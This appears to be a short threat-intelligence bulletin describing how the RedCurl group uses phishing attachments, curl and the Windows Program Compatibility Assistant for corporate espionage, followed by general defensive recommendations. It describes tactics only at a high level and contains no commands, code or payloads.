RedCurl Cybercrime Group Abuses Windows PCA Tool for Corporate Espionage

Researchers at Trendmicro, discovered the cybercriminal group RedCurl, also known as Earth Kapre and Red Wolf, has been exploiting the Program Compatibility Assistant, a legitimate Windows component to carry out malicious activities. Trend Micro’s analysis revealed that RedCurl, also known as Earth Kapre and Red Wolf has been active since at least 2018, targeting entities across various countries including Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S. Their modus operandi involves phishing emails containing malicious attachments, typically .ISO and .IMG files, which initiate a multi-stage attack process.

This process starts with the use of cmd[.]exe to download a legitimate utility called curl from a remote server, establishing a channel to deliver a loader. The malicious DLL file leverages PCA to spawn a downloader process establishing a connection with the same domain used by curl to fetch the loader.

Security Officer Comments:
Furthermore, Red Curl employs Impacket, an open-source software for unauthorized command execution, further complicating detection efforts. Additionally, this development comes as the Russian nation-state group known as Turla, has begun employing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.

Suggested Corrections:
This instance emphasizes the significance of threat intelligence in bridging gaps within investigations, filling missing pieces of evidence that are crucial for comprehensive understanding and protection. Understanding the threat actor behind an attack is paramount for organizations seeking to bolster their defenses.

The role of MDR in uncovering intrusion sets, as demonstrated in this recent incident investigation, exemplifies its critical contribution to cybersecurity. MDR played a key role in attributing the evidence extracted from the attack to the Earth Kapre threat group. This reinforces the essential role of advanced threat detection and response solutions in effectively countering sophisticated threat actors.

Organizations should also consider using a multilayered approach to guard possible entry points into the system (endpoint, email, web, and network).